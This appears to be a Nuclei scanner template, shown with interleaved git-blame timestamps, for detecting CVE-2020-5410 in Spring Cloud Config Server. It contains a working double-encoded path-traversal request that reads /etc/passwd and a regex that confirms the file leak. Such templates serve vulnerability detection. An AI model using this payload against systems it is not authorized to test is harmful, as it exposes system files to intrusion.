2021-01-02 04:56:15 +00:00
id : CVE-2020-5410
2020-06-18 10:16:29 +00:00
info :
2022-06-28 19:02:20 +00:00
name : Spring Cloud Config Server - Local File Inclusion
2020-06-18 10:16:29 +00:00
author : mavericknerd
severity : high
2022-06-28 19:13:15 +00:00
description : Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack.
2022-04-22 10:38:41 +00:00
reference :
- https://tanzu.vmware.com/security/cve-2020-5410
2022-06-28 19:02:20 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-5410
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-5410
2023-07-11 19:49:27 +00:00
cwe-id : CWE-22,CWE-23
2023-08-31 11:46:18 +00:00
epss-score : 0.9725
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.99762
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : vmware
product : spring_cloud_config
tags : cve,cve2020,lfi,springcloud,config,traversal,kev
2020-06-18 10:16:29 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-06-18 10:16:29 +00:00
- method : GET
path :
2021-01-14 14:41:56 +00:00
- "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
2022-07-02 11:33:08 +00:00
2021-01-14 14:51:36 +00:00
matchers-condition : and
2020-06-18 10:16:29 +00:00
matchers :
- type : regex
2022-07-02 11:33:08 +00:00
part : body
2020-06-18 10:16:29 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2022-07-02 11:33:08 +00:00
- type : status
status :
- 200